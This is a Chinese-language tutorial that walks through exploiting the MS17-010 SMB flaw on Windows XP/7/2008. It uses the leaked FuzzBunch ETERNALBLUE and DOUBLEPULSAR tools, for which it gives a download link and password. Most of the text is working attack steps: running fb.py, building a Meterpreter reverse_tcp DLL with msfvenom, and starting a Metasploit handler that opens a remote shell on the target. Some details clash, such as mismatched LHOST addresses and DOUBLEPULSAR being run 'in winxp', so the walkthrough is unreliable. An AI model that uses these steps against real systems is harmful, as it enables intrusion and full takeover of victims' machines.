FuzzBunch之Eternalblue

利用MS17-010漏洞 入侵winxp win server 2008 或 win7。
最近方程式组织爆出漏洞以及shadowbrokers放出的工具搞得沸沸扬扬,本篇的工具shadowbrokers早在12年就已经写出来了,有点可怕。
附上工具链接
链接:http://pan.baidu.com/s/1ge2RFVH 密码:0dtr

漏洞复现

前期准备

  • win7 攻击机 192.168.226.128 环境需要python2.6.6以及pywin32
  • winxp 靶机 192.168.226.130 开启SMB服务 445端口 建议关闭防火墙
  • kali2 192.168.226.136 用来生成攻击payload和反弹shell

工具利用

将windows目录拷贝到攻击机win7上,在目录下建立文件夹listeningposts

运行fb.py

请输入图片描述
请输入图片描述

日志就放在windows下有个log_dirs
之后会询问new project name 就是日志文件名称

然后执行

use ETERNALBLUE

一路回车直到

请输入图片描述

这里mode选择1 使用常规部署方式 也就是在靶机上建立后门 带有模糊测试

然后一路回车

请输入图片描述

执行成功

然后我们到kali2下用msf生成用于反弹shell的dll

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=8089 -f dll > reverser_tcp.dll

将reverser_tcp.dll文件拷贝到win7的C盘根目录下
在msf下开启msfpayload监听

msfconsole

msf >   use exploit/multi/handler
        set LHOST 192.168.226.136
        set LPORT 8089
        set PAYLOAD windows/meterpreter/reverse_tcp
        exploit

请输入图片描述

然后在winxp中执行

use DOUBLEPULSAR

请输入图片描述
请输入图片描述

利用成功

请输入图片描述
请输入图片描述

成功控制靶机